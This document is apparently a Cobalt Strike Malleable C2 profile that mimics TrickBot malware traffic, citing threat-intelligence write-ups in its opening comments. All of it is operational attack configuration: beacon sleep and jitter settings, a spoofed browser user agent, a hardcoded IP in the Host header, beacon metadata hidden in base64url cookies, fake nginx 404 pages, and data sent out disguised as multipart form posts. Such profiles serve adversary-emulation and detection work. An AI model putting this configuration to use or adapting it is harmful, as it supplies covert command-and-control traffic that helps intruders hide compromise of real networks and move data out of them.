#trickbot #https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers #https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/ #xx0hcd set sleeptime "30000"; set jitter "20"; set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"; set dns_idle "8.8.8.8"; set maxdns "235"; http-get { set uri "/"; client { header "Host" "203.150.19.63:443"; header "Connection" "Keep-Alive"; header "Cache-Control" "no-cache"; metadata { base64url; prepend "D007="; header "Cookie"; } } server { header "Server" "nginx"; header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; header "Content-Type" "text/html"; header "Connection" "keep-alive"; output { base64url; prepend " 404 Not Found

404 Not Found

nginx "; print; } } } http-post { set uri "/response.php"; client { header "Content-Type" "multipart/form-data; boundary=----ZMZTCR"; output { netbios; prepend "----ZMZTCR Content-Disposition: form-data;name='sourcelink' "; append " Content-Disposition: form-data;name='sourcequery' ----ZMZTCR"; print; } id { base64url; header "Cookie"; } } server { header "Server" "nginx"; header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; header "Content-Type" "text/html; charset=utf-8"; header "Connection" "keep-alive"; output { base64; print; } } } http-stager { server { header "Server" "nginx"; header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; header "Content-Type" "text/html; charset=utf-8"; header "Connection" "keep-alive"; } }